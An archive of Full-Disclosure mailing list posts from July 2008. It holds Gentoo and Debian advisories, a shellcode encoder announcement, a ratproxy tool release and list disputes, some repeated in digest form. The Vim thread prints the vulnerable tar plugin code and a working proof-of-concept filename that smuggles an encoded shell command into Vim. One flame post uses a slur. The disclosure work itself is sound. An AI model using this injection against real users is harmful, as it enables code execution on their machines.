was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 197 bytes Desc: OpenPGP digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080701/26592a7c/attachment.bin From keytoaster at gentoo.org Tue Jul 1 12:59:36 2008 From: keytoaster at gentoo.org (Tobias Heinlein) Date: Tue, 01 Jul 2008 13:59:36 +0200 Subject: [Full-disclosure] [ GLSA 200807-02 ] Motion: Execution of arbitrary code Message-ID: <486A1C28.3010409@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200807-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Motion: Execution of arbitrary code Date: July 01, 2008 Bugs: #227053 ID: 200807-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities in Motion might result in the execution of arbitrary code. Background ========== Motion is a program that monitors the video signal from one or more cameras and is able to detect motions. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 media-video/motion < 3.2.10.1 >= 3.2.10.1 Description =========== Nico Golde reported an off-by-one error within the read_client() function in the webhttpd.c file, leading to a stack-based buffer overflow. Stefan Cornelius (Secunia Research) reported a boundary error within the same function, also leading to a stack-based buffer overflow. Both vulnerabilities require that the HTTP Control interface is enabled. Impact ====== A remote attacker could exploit these vulnerabilities by sending an overly long or specially crafted request to a vulnerable Motion HTTP control interface, possibly resulting in the execution of arbitrary code with the privileges of the motion user. Workaround ========== There is no known workaround at this time. Resolution ========== All Motion users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=media-video/motion-3.2.10.1" References ========== [ 1 ] CVE-2008-2654 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2654 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200807-02.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 197 bytes Desc: OpenPGP digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080701/b9cded25/attachment.bin From berendjanwever at gmail.com Tue Jul 1 13:18:34 2008 From: berendjanwever at gmail.com (Berend-Jan Wever) Date: Tue, 1 Jul 2008 14:18:34 +0200 Subject: [Full-disclosure] Alphanumeric shellcode improvements Message-ID: <3fa2f5bb0807010518g1316eb13habc42e109ee1b7d9@mail.gmail.com> Hi all, I've not had as much opportunity in the last three years to contribute, but I do have some new stuff: I've decided to pre-release some parts of ALPHA3, the upcoming new version of my alphanumeric shellcode encoder: * I've reduced the size of the mixedcase ascii decoder: http://skypher.com/wiki/index.php?title=Mixedcase_ASCII_alphanumeric_code_decoder_for_x86 * I've created a lowercase ascii decoder: http://skypher.com/wiki/index.php?title=Lowercase_ASCII_alphanumeric_code_decoder_for_x86 * I've created a mixedcase ascii decoder for x64: http://skypher.com/wiki/index.php?title=Mixedcase_ASCII_alphanumeric_code_decoder_for_x64 See http://skypher.com/wiki/index.php?title=ALPHA3 for a complete list and some documentation. Cheers, SkyLined -- Berend-Jan "SkyLined" Wever Email & Live messenger: berendjanwever at gmail.com -- 'The historical abuses of new data occurred between the time that a few people learned the important thing and the time when that important thing became general knowledge. To the Gowachin and to BuSab it was the "Data Gap," a source of constant danger.' -- Frank Herbert, 'The Dosadi Experiment' -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080701/adf69bc9/attachment.html From mrdkaaa at stream.cz Tue Jul 1 15:39:54 2008 From: mrdkaaa at stream.cz (mrdkaaa at stream.cz) Date: Tue, 01 Jul 2008 16:39:54 +0200 (CEST) Subject: [Full-disclosure] [SCANIT-2008-001] QNX phgrafx Privilege Escalation Vulnerability Message-ID: <4.4-28953-1047754371-1214923194@stream.cz> This vulnerability is at least two years old. Anyway, what's the point of releasing a security advisory for a vendor well known to never going to patch it? From rdancer at rdancer.org Tue Jul 1 20:36:29 2008 From: rdancer at rdancer.org (=?UTF-8?Q?Jan_Min=C3=A1=C5=99?=) Date: Tue, 1 Jul 2008 20:36:29 +0100 Subject: [Full-disclosure] Collection of Vulnerabilities in Fully Patched Vim 7.1 In-Reply-To: <200806141309.m5ED9bLg058230@moolenaar.net> References: <6edf76c20806131543k4f78dec8y268eeee2468c7dea@mail.gmail.com> <200806141309.m5ED9bLg058230@moolenaar.net> Message-ID: <6edf76c20807011236t7f96955h924c2692705b6ff4@mail.gmail.com> On Sat, Jun 14, 2008 at 2:09 PM, Bram Moolenaar wrote: > > Jan Minar wrote: > >> 1. Summary >> >> Product : Vim -- Vi IMproved >> Version : Tested with 7.1.314 and 6.4 >> Impact : Arbitrary code execution >> Wherefrom: Local and remote >> Original : http://www.rdancer.org/vulnerablevim.html >> >> Improper quoting in some parts of Vim written in the Vim Script can lead to >> arbitrary code execution upon opening a crafted file. > Note that version 7.1.314, as reported in the Summary, does not have > most of the reported problems. The problems in the plugins have also > been fixed, this requires updating the runtime files. Information about > that can be found at http://www.vim.org/runtime.php I do apologize: as written in the advisory, the version I worked with was 7.1.298. 7.1.314 was only partly vulnerable. FWIW, I have updated the advisory at http://www.rdancer.orgvulnerablevim.html . Thanks to Bram for all the good work. 7.2a.10 with updated runtime is still vulnerable to the zipplugin attack, and an updated tarplugin attack: ------------------------------------------- -------- Test results below --------------- ------------------------------------------- filetype.vim strong : EXPLOIT FAILED weak : EXPLOIT FAILED tarplugin : EXPLOIT FAILED tarplugin.updated: VULNERABLE zipplugin : VULNERABLE xpm.vim xpm : EXPLOIT FAILED xpm2 : EXPLOIT FAILED remote : EXPLOIT FAILED gzip_vim : EXPLOIT FAILED netrw : EXPLOIT FAILED The original tarplugin exploit now produces a string of telling error messages: /bin/bash: so%: command not found tar: /home/rdancer/vuln/vim/tarplugin/sploit/foo'|sosploit/foo: Cannot open: No such file or directory tar: Error is not recoverable: exiting now /bin/bash: retu: command not found /bin/bash: bar.tar|retu|'bar.tar: command not found It's easy to see that it is still possible to execute arbitrary shell commands. $VIMRUNTIME/autoload/tar.vim of Vim 7.2a.10: 136 if tarfile =~# '\.\(gz\|tgz\)$' 137 " call Decho("1: exe silent r! gzip -d -c ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ") *138 exe "silent r! gzip -d -c -- ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - " 139 elseif tarfile =~# '\.lrp' 140 " call Decho("2: exe silent r! cat -- ".s:Escape(tarfile)."|gzip -d -c -|".g:tar_cmd." -".g:tar_browseoptions." - ") *141 exe "silent r! cat -- ".s:Escape(tarfile)."|gzip -d -c -|".g:tar_cmd." -".g:tar_browseoptions." - " 142 elseif tarfile =~# '\.bz2$' 143 " call Decho("3: exe silent r! bzip2 -d -c ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ") *144 exe "silent r! bzip2 -d -c -- ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - " 145 else 146 " call Decho("4: exe silent r! ".g:tar_cmd." -".g:tar_browseoptions." ".s:Escape(tarfile)) **147 exe "silent r! ".g:tar_cmd." -".g:tar_browseoptions." ".s:Escape(tarfile) [...] 444 fun s:Escape(name) 445 " shellescape() was added by patch 7.0.111 446 if exists("*shellescape") 447 let qnameq= shellescape(a:name) 448 else 449 let qnameq= g:tar_shq . a:name . g:tar_shq 450 endif 451 return qnameq 452 endfun (*) s:Escape() does not suffice, as it fails to escape ``%'' and friends. (**) tar(1) allows arbitrary command execution via options ``--to-command'', and ``--use-compress-program''. The updated tarplugin attack is rather simple: $ rm -rf ./* $ touch "foo%;eval eval \`echo 0:64617465203e2070776e6564 | xxd -r\`;'bar.tar" $ vim +:q ./foo* $ ls -l pwned -rw-r--r-- 1 rdancer users 29 2008-07-01 20:18 pwned Cheers, Jan Minar. From skx at debian.org Tue Jul 1 21:25:39 2008 From: skx at debian.org (Steve Kemp) Date: Tue, 1 Jul 2008 21:25:39 +0100 Subject: [Full-disclosure] [SECURITY] [DSA 1560-1] New sympa packages fix denial of service Message-ID: <20080701202539.GA32605@steve.org.uk> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1600-1 security at debian.org http://www.debian.org/security/ Steve Kemp July 01, 2008 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : sympa Vulnerability : dos Problem type : remote Debian-specific: no CVE Id(s) : CVE-2008-1648 Debian Bug : 475163 It was discovered that sympa, a modern mailing list manager, would crash when processing certain types of malformed messages. For the stable distribution (etch), this problem has been fixed in version 5.2.3-1.2+etch1. For the unstable distribution (sid), this problem has been fixed in version 5.3.4-4. We recommend that you upgrade your sympa package. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Source archives: http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1.dsc Size/MD5 checksum: 625 c7e720e56b1c4e9778cea822ed150a19 http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1.diff.gz Size/MD5 checksum: 96804 a93d8ec3dcbc0a0aed99e513c5749c0e http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3.orig.tar.gz Size/MD5 checksum: 5102528 355cb9174841205831191c93a83da895 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_alpha.deb Size/MD5 checksum: 3589148 26b92215ed7b17531c3702ff76b30901 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_amd64.deb Size/MD5 checksum: 3591854 531781d522ad5f02e6c5b658883ed37d arm architecture (ARM) http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_arm.deb Size/MD5 checksum: 3590606 dc3437760b7db4761f90e992e3638c52 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_hppa.deb Size/MD5 checksum: 3591482 5601933860831577cb017cb0aa3b31fe i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_i386.deb Size/MD5 checksum: 3567454 0c6e3d6046f7d0e9920ed7ce9780b103 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_ia64.deb Size/MD5 checksum: 3571256 c294184494968264ff0857fc2b907711 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_mips.deb Size/MD5 checksum: 3584362 1b3371fe22966b198a3c338167e71909 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_powerpc.deb Size/MD5 checksum: 3568314 57c566c13cd31f66bbe3652b4c9ea3e7 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_s390.deb Size/MD5 checksum: 3568574 afab57a71590dcdd685746b6500040b0 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_sparc.deb Size/MD5 checksum: 3568016 0bf312e31bb5df28404ea40842845caf These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFIapKKwM/Gs81MDZ0RAqAtAJ4qQlnuRralKZTMQhtDqYvMXfaqdQCgof4S 6REh7OX9zxqgWYGHqQWtEpQ= =ANTa -----END PGP SIGNATURE----- From lcamtuf at dione.cc Wed Jul 2 01:02:02 2008 From: lcamtuf at dione.cc (Michal Zalewski) Date: Wed, 2 Jul 2008 02:02:02 +0200 (CEST) Subject: [Full-disclosure] [tool] ratproxy - passive web application security assessment tool Message-ID: Hi all, I am happy to announce that we've just open sourced ratproxy - a free, passive web security assessment tool. This utility is designed to transparently analyze legitimate, browser-driven interactions with tested web applications - and automatically pinpoint, annotate, and prioritize potential flaws or areas of concern on the fly. The proxy analyzes problems such as cross-site script inclusion threats, insufficient cross-site request forgery defenses, caching issues, potentially unsafe cross-domain code inclusion schemes and information leakage scenarios, and much more. For a detailed discussion of the utility, please visit: http://code.google.com/p/ratproxy/wiki/RatproxyDoc Source code is available at: http://code.google.com/p/ratproxy/downloads/list And finally, screenshot of a sample report can be found here: http://lcamtuf.coredump.cx/ratproxy-screen.png The tool should run on Linux, *BSD, MacOS X, and Windows (Cygwin). Since it is in beta, there might be some kinks to be ironed out, and not all web technologies might be properly accounted for. Feedback is appreciated. Please keep in mind that the proxy is meant to highlight interesting patterns in web applications; a further analysis by a security professional is required to interpret the significance of results for a particular platform. Cheers, /mz From filipe at balestra.com.br Wed Jul 2 06:19:01 2008 From: filipe at balestra.com.br (Filipe Balestra) Date: Wed, 2 Jul 2008 02:19:01 -0300 Subject: [Full-disclosure] [SCANIT-2008-001] QNX phgrafx Privilege Escalation Vulnerability Message-ID: mrdkaaa, are you saying that this vulnerability is not new to the public? The program phgrafx had some vulnerabilities published, but this one is not the same of any other that I can find in securityfocus. One program can have a lot of vulnerabilities :) But yes, this vulnerability is at least four years old, but was not public. Anyway, QNX released Service Packs to solve some security problems in the past, and it's not our problem, we are advising the customers, they can choose or not the company. If you are a customer you probably would like to know about security issues in all product that you use. Also, we agree it's a crap vuln, that's why we took too long to release it. Whatever, why hold it? p.s.: Rodrigo and me are no longer working for Scanit, so it's just a personal opinion, not a company official position. If you want to know about the company vulnerability release process or any other information, please, contact the Scanit R&D team. Cheers, Filipe Alcarde Balestra -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080702/cd6c973d/attachment.html From tonnerre.lombard at sygroup.ch Wed Jul 2 07:29:43 2008 From: tonnerre.lombard at sygroup.ch (Tonnerre Lombard) Date: Wed, 2 Jul 2008 08:29:43 +0200 Subject: [Full-disclosure] Full-Disclosure? introducing lul-disclosure. In-Reply-To: References: Message-ID: <20080702082943.2811aba5@wssyg117.sygroup-int.ch> Salut, On Mon, 30 Jun 2008 21:57:29 -0400, staff wrote: > Are you ready for a site that isn't full of fagottry? Where Gadi cant > steal your money or eat your lunches? Where you can freely submit > lulz to be published? Where Theo's defeat and denial are brought to > light? Wait no more! You mean a site which evidently cannot tell the difference between local and remote root vulnerabilities? (The local root exploit for obsd4 which is published on that site contains a patch to increment the count of _remote_ vulnerabilities on the obsd web site.) Tonnerre -- SyGroup GmbH Tonnerre Lombard Solutions Systematiques Tel:+41 61 333 80 33 G?terstrasse 86 Fax:+41 61 383 14 67 4053 Basel Web:www.sygroup.ch tonnerre.lombard at sygroup.ch -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 835 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080702/0174b22f/attachment.bin From deepsec at deepsec.net Tue Jul 1 20:47:36 2008 From: deepsec at deepsec.net (DeepSec 2008) Date: Tue, 01 Jul 2008 21:47:36 +0200 Subject: [Full-disclosure] Deepsec Talks 2007 are online - registration for 2008 is open Message-ID: <486A89D8.2000303@deepsec.net> Dear Madam, dear Sir, DeepSec Vienna, the annual In-Depth Security Conference has opened online registrations for 2008. Registrations will receive a discount of 5% off the regular fees until August 31st if you use the following promotional code: earlybird-L4KZIEUE on our online registration form at https://deepsec.net/register/ Videos from 2007 are online: Also we are happy to announce that talks from last years conference are online. Listen to last years talks in full length at: http://video.google.com/videosearch?q=deepsec&sitesearch=# Call for Papers still Open for two weeks: If you have some good ideas for a Talk at the conference and haven't decided yet to submit we encourage you to do so now. We still accept submissions at https://deepsec.net/cfp/ or via e-mail to: cfp at deepsec.net We hope to hear from you and of course to meet in Vienna in November! Best Regards, Paul B?hm, Ren? Pfeiffer, Michael Kafka DeepSec GmbH -- DeepSec In-Depth Security Conference November 11nd to 14th 2008, Vienna, Austria https://deepsec.net/ From root_ at fibertel.com.ar Wed Jul 2 08:08:38 2008 From: root_ at fibertel.com.ar (root) Date: Wed, 02 Jul 2008 04:08:38 -0300 Subject: [Full-disclosure] Full-Disclosure? introducing lul-disclosure. In-Reply-To: References: Message-ID: <486B2976.8000708@fibertel.com.ar> You couldn't do the remote exploit even with a google video documenting it step by step. More like fail-disclosure. staff wrote: > Are you ready for a site that isn't full of fagottry? Where Gadi cant steal > your money or eat your lunches? Where you can freely submit lulz to be > published? Where Theo's defeat and denial are brought to light? Wait no > more! > > http://lul-disclosure.net/ > > WhiteHat? BlackHat? We are lulzhat. > Fuck you and your hats. > > > > ------------------------------------------------------------------------ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ From gigiyousef at hotmail.com Wed Jul 2 12:15:35 2008 From: gigiyousef at hotmail.com (badr muhyeddin) Date: Wed, 2 Jul 2008 14:15:35 +0300 Subject: [Full-disclosure] Full-Disclosure Digest, Vol 41, Issue 3 In-Reply-To: References: Message-ID: > From: full-disclosure-request at lists.grok.org.uk> Subject: Full-Disclosure Digest, Vol 41, Issue 3> To: full-disclosure at lists.grok.org.uk> Date: Wed, 2 Jul 2008 12:00:01 +0100> > Send Full-Disclosure mailing list submissions to> full-disclosure at lists.grok.org.uk> > To subscribe or unsubscribe via the World Wide Web, visit> https://lists.grok.org.uk/mailman/listinfo/full-disclosure> or, via email, send a message with subject or body 'help' to> full-disclosure-request at lists.grok.org.uk> > You can reach the person managing the list at> full-disclosure-owner at lists.grok.org.uk> > When replying, please edit your Subject line so it is more specific> than "Re: Contents of Full-Disclosure digest..."> > > Note to digest recipients - when replying to digest posts, please trim your post appropriately. Thank you.> > > Today's Topics:> > 1. [ GLSA 200807-01 ] Python: Multiple integer overflows> (Tobias Heinlein)> 2. [ GLSA 200807-02 ] Motion: Execution of arbitrary code> (Tobias Heinlein)> 3. Alphanumeric shellcode improvements (Berend-Jan Wever)> 4. Re: [SCANIT-2008-001] QNX phgrafx Privilege Escalation> Vulnerability (mrdkaaa at stream.cz)> 5. Re: Collection of Vulnerabilities in Fully Patched Vim 7.1> ( Jan Min?? )> 6. [SECURITY] [DSA 1560-1] New sympa packages fix denial of> service (Steve Kemp)> 7. [tool] ratproxy - passive web application security assessment> tool (Michal Zalewski)> 8. Re: [SCANIT-2008-001] QNX phgrafx Privilege Escalation> Vulnerability (Filipe Balestra)> 9. Re: Full-Disclosure? introducing lul-disclosure.> (Tonnerre Lombard)> 10. Deepsec Talks 2007 are online - registration for 2008 is open> (DeepSec 2008)> 11. Re: Full-Disclosure? introducing lul-disclosure. (root)> > > ----------------------------------------------------------------------> > Message: 1> Date: Tue, 01 Jul 2008 13:51:43 +0200> From: Tobias Heinlein > Subject: [Full-disclosure] [ GLSA 200807-01 ] Python: Multiple integer> overflows> To: gentoo-announce at gentoo.org> Cc: full-disclosure at lists.grok.org.uk, bugtraq at securityfocus.com,> security-alerts at linuxsecurity.com> Message-ID: <486A1A4F.1080404 at gentoo.org>> Content-Type: text/plain; charset="utf-8"> > - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -> Gentoo Linux Security Advisory GLSA 200807-01> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -> http://security.gentoo.org/> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -> > Severity: Normal> Title: Python: Multiple integer overflows> Date: July 01, 2008> Bugs: #216673, #217221> ID: 200807-01> > - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -> > Synopsis> ========> > Multiple integer overflows may allow for Denial of Service.> > Background> ==========> > Python is an interpreted, interactive, object-oriented programming> language.> > Affected packages> =================> > -------------------------------------------------------------------> Package / Vulnerable / Unaffected> -------------------------------------------------------------------> 1 dev-lang/python < 2.4.4-r13 *>= 2.3.6-r6> >= 2.4.4-r13> > Description> ===========> > Multiple vulnerabilities were discovered in Python:> > * David Remahl reported multiple integer overflows in the file> imageop.c, leading to a heap-based buffer overflow (CVE-2008-1679).> This issue is due to an incomplete fix for CVE-2007-4965.> > * Justin Ferguson discovered that an integer signedness error in the> zlib extension module might trigger insufficient memory allocation> and a buffer overflow via a negative signed integer (CVE-2008-1721).> > * Justin Ferguson discovered that insufficient input validation in> the PyString_FromStringAndSize() function might lead to a buffer> overflow (CVE-2008-1887).> > Impact> ======> > A remote attacker could exploit these vulnerabilities to cause a Denial> of Service or possibly the remote execution of arbitrary code with the> privileges of the user running Python.> > Workaround> ==========> > There is no known workaround at this time.> > Resolution> ==========> > The imageop module is no longer built in the unaffected versions.> > All Python 2.3 users should upgrade to the latest version:> > # emerge --sync> # emerge --ask --oneshot --verbose ">=dev-lang/python-2.3.6-r6"> > All Python 2.4 users should upgrade to the latest version:> > # emerge --sync> # emerge --ask --oneshot --verbose ">=dev-lang/python-2.4.4-r13"> > References> ==========> > [ 1 ] CVE-2008-1679> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1679> [ 2 ] CVE-2008-1721> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1721> [ 3 ] CVE-2008-1887> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1887> > Availability> ============> > This GLSA and any updates to it are available for viewing at> the Gentoo Security Website:> > http://security.gentoo.org/glsa/glsa-200807-01.xml> > Concerns?> =========> > Security is a primary focus of Gentoo Linux and ensuring the> confidentiality and security of our users machines is of utmost> importance to us. Any security concerns should be addressed to> security at gentoo.org or alternatively, you may file a bug at> http://bugs.gentoo.org.> > License> =======> > Copyright 2008 Gentoo Foundation, Inc; referenced text> belongs to its owner(s).> > The contents of this document are licensed under the> Creative Commons - Attribution / Share Alike license.> > http://creativecommons.org/licenses/by-sa/2.5> > -------------- next part --------------> A non-text attachment was scrubbed...> Name: signature.asc> Type: application/pgp-signature> Size: 197 bytes> Desc: OpenPGP digital signature> Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080701/26592a7c/attachment-0001.bin > > ------------------------------> > Message: 2> Date: Tue, 01 Jul 2008 13:59:36 +0200> From: Tobias Heinlein > Subject: [Full-disclosure] [ GLSA 200807-02 ] Motion: Execution of> arbitrary code> To: gentoo-announce at gentoo.org> Cc: full-disclosure at lists.grok.org.uk, bugtraq at securityfocus.com,> security-alerts at linuxsecurity.com> Message-ID: <486A1C28.3010409 at gentoo.org>> Content-Type: text/plain; charset="utf-8"> > - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -> Gentoo Linux Security Advisory GLSA 200807-02> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -> http://security.gentoo.org/> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -> > Severity: Normal> Title: Motion: Execution of arbitrary code> Date: July 01, 2008> Bugs: #227053> ID: 200807-02> > - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -> > Synopsis> ========> > Multiple vulnerabilities in Motion might result in the execution of> arbitrary code.> > Background> ==========> > Motion is a program that monitors the video signal from one or more> cameras and is able to detect motions.> > Affected packages> =================> > -------------------------------------------------------------------> Package / Vulnerable / Unaffected> -------------------------------------------------------------------> 1 media-video/motion < 3.2.10.1 >= 3.2.10.1> > Description> ===========> > Nico Golde reported an off-by-one error within the read_client()> function in the webhttpd.c file, leading to a stack-based buffer> overflow. Stefan Cornelius (Secunia Research) reported a boundary error> within the same function, also leading to a stack-based buffer> overflow. Both vulnerabilities require that the HTTP Control interface> is enabled.> > Impact> ======> > A remote attacker could exploit these vulnerabilities by sending an> overly long or specially crafted request to a vulnerable Motion HTTP> control interface, possibly resulting in the execution of arbitrary> code with the privileges of the motion user.> > Workaround> ==========> > There is no known workaround at this time.> > Resolution> ==========> > All Motion users should upgrade to the latest version:> > # emerge --sync> # emerge --ask --oneshot --verbose ">=media-video/motion-3.2.10.1"> > References> ==========> > [ 1 ] CVE-2008-2654> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2654> > Availability> ============> > This GLSA and any updates to it are available for viewing at> the Gentoo Security Website:> > http://security.gentoo.org/glsa/glsa-200807-02.xml> > Concerns?> =========> > Security is a primary focus of Gentoo Linux and ensuring the> confidentiality and security of our users machines is of utmost> importance to us. Any security concerns should be addressed to> security at gentoo.org or alternatively, you may file a bug at> http://bugs.gentoo.org.> > License> =======> > Copyright 2008 Gentoo Foundation, Inc; referenced text> belongs to its owner(s).> > The contents of this document are licensed under the> Creative Commons - Attribution / Share Alike license.> > http://creativecommons.org/licenses/by-sa/2.5> > -------------- next part --------------> A non-text attachment was scrubbed...> Name: signature.asc> Type: application/pgp-signature> Size: 197 bytes> Desc: OpenPGP digital signature> Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080701/b9cded25/attachment-0001.bin > > ------------------------------> > Message: 3> Date: Tue, 1 Jul 2008 14:18:34 +0200> From: "Berend-Jan Wever" > Subject: [Full-disclosure] Alphanumeric shellcode improvements> To: full-disclosure at lists.grok.org.uk> Message-ID:> <3fa2f5bb0807010518g1316eb13habc42e109ee1b7d9 at mail.gmail.com>> Content-Type: text/plain; charset="iso-8859-1"> > Hi all,> > I've not had as much opportunity in the last three years to contribute, but> I do have some new stuff: I've decided to pre-release some parts of ALPHA3,> the upcoming new version of my alphanumeric shellcode encoder:> * I've reduced the size of the mixedcase ascii decoder:> http://skypher.com/wiki/index.php?title=Mixedcase_ASCII_alphanumeric_code_decoder_for_x86> * I've created a lowercase ascii decoder:> http://skypher.com/wiki/index.php?title=Lowercase_ASCII_alphanumeric_code_decoder_for_x86> * I've created a mixedcase ascii decoder for x64:> http://skypher.com/wiki/index.php?title=Mixedcase_ASCII_alphanumeric_code_decoder_for_x64> See http://skypher.com/wiki/index.php?title=ALPHA3 for a complete list and> some documentation.> > Cheers,> SkyLined> > -- > Berend-Jan "SkyLined" Wever> Email & Live messenger: berendjanwever at gmail.com> --> 'The historical abuses of new data occurred between the time that a few> people learned the important thing and the time when that important thing> became general knowledge. To the Gowachin and to BuSab it was the "Data> Gap," a source of constant danger.'> -- Frank Herbert, 'The Dosadi Experiment'> -------------- next part --------------> An HTML attachment was scrubbed...> URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080701/adf69bc9/attachment-0001.html > > ------------------------------> > Message: 4> Date: Tue, 01 Jul 2008 16:39:54 +0200 (CEST)> From: mrdkaaa at stream.cz> Subject: Re: [Full-disclosure] [SCANIT-2008-001] QNX phgrafx Privilege> Escalation Vulnerability> To: full-disclosure at lists.grok.org.uk> Message-ID: <4.4-28953-1047754371-1214923194 at stream.cz>> Content-Type: text/plain; charset="us-ascii"> > This vulnerability is at least two years old. Anyway, what's the point of releasing> a security advisory for a vendor well known to never going to patch it?> > > > ------------------------------> > Message: 5> Date: Tue, 1 Jul 2008 20:36:29 +0100> From: " Jan Min?? " > Subject: Re: [Full-disclosure] Collection of Vulnerabilities in Fully> Patched Vim 7.1> To: full-disclosure at lists.grok.org.uk, bugtraq at securityfocus.com,> vim_dev at googlegroups.com, "Bram Moolenaar" > Cc: bugs at vim.org> Message-ID:> <6edf76c20807011236t7f96955h924c2692705b6ff4 at mail.gmail.com>> Content-Type: text/plain; charset=UTF-8> > On Sat, Jun 14, 2008 at 2:09 PM, Bram Moolenaar wrote:> >> > Jan Minar wrote:> >> >> 1. Summary> >>> >> Product : Vim -- Vi IMproved> >> Version : Tested with 7.1.314 and 6.4> >> Impact : Arbitrary code execution> >> Wherefrom: Local and remote> >> Original : http://www.rdancer.org/vulnerablevim.html> >>> >> Improper quoting in some parts of Vim written in the Vim Script can lead to> >> arbitrary code execution upon opening a crafted file.> > > Note that version 7.1.314, as reported in the Summary, does not have> > most of the reported problems. The problems in the plugins have also> > been fixed, this requires updating the runtime files. Information about> > that can be found at http://www.vim.org/runtime.php> > I do apologize: as written in the advisory, the version I worked with> was 7.1.298. 7.1.314 was only partly vulnerable. FWIW, I have> updated the advisory at http://www.rdancer.orgvulnerablevim.html .> > Thanks to Bram for all the good work.> > 7.2a.10 with updated runtime is still vulnerable to the zipplugin> attack, and an updated tarplugin attack:> > -------------------------------------------> -------- Test results below ---------------> -------------------------------------------> filetype.vim> strong : EXPLOIT FAILED> weak : EXPLOIT FAILED> tarplugin : EXPLOIT FAILED> tarplugin.updated: VULNERABLE> zipplugin : VULNERABLE> xpm.vim> xpm : EXPLOIT FAILED> xpm2 : EXPLOIT FAILED> remote : EXPLOIT FAILED> gzip_vim : EXPLOIT FAILED> netrw : EXPLOIT FAILED> > The original tarplugin exploit now produces a string of telling error messages:> > /bin/bash: so%: command not found> tar: /home/rdancer/vuln/vim/tarplugin/sploit/foo'|sosploit/foo:> 